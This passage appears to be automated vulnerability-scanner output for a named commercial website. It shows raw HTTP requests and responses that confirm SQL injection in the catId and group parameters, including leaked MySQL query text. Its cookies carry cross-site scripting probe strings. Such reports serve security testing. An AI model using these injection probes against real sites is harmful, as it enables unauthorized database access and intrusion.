Referer: http://www.insideup.com/ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 564

subcategoryId=30009&catId=30009&iusrc=iupsc+&attributeId_387=1894__Collect+from+both+businesses+and+individual+consumers&attributeId_388=1903__%241%2c000%2c000%2b&attributeId_389=1910__50%2b&attribute
...[SNIP]...

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:35:10 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=q3c7vlg86vmu4u1t9i4uu3egv4; path=/
Content-Length: 20
Connection: close
Content-Type: text/html; charset=UTF-8

Too many connections

1.233. http://www.insideup.com/ppc/leadflow/deco00/project_dynamic_page_updated.php [catId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/deco00/project_dynamic_page_updated.php

Issue detail

The catId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the catId parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/deco00/project_dynamic_page_updated.php?catId=30009'&group=deco00&template=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:22:19 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=9bg3g4g2iek4e8ifh2ekqbsju1; path=/
Content-Length: 2486
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
leadflow/deco00/project_dynamic_page_updated.php?catId=30009'&group=deco00&template=3' OR prj.project_page_url = 'leadflow/deco00/project_dynamic_page_updated.php?catId=30009'&group=deco00&template=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'group=deco00&template=3' OR prj.project_page_url = 'leadflow/deco00/project_dyna' at line 5

Request 2

GET /ppc/leadflow/deco00/project_dynamic_page_updated.php?catId=30009''&group=deco00&template=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 06:22:19 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=80vbmse6gkrpop7t2qbjot2ad0; path=/
Content-Length: 127
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/deco00/project_dynamic_page_updated.php was not found on this server.</p>

1.234. http://www.insideup.com/ppc/leadflow/deco00/project_dynamic_page_updated.php [group parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/deco00/project_dynamic_page_updated.php

Issue detail

The group parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the group parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/deco00/project_dynamic_page_updated.php?catId=30009&group=deco00'&template=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 06:22:31 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=h5d156rqifh3mdr3ujjq570p17; path=/
Content-Length: 2486
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
leadflow/deco00/project_dynamic_page_updated.php?catId=30009&group=deco00'&template=3' OR prj.project_page_url = 'leadflow/deco00/project_dynamic_page_updated.php?catId=30009&group=deco00'&template=3/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR prj.project_page_url = 'leadflow/deco00/project_dynamic_page_updated.php?ca' at line 5

Request 2

GET /ppc/leadflow/deco00/project_dynamic_page_updated.php?catId=30009&group=deco00''&template=3 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/deco00/project.php?catId=30009&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; 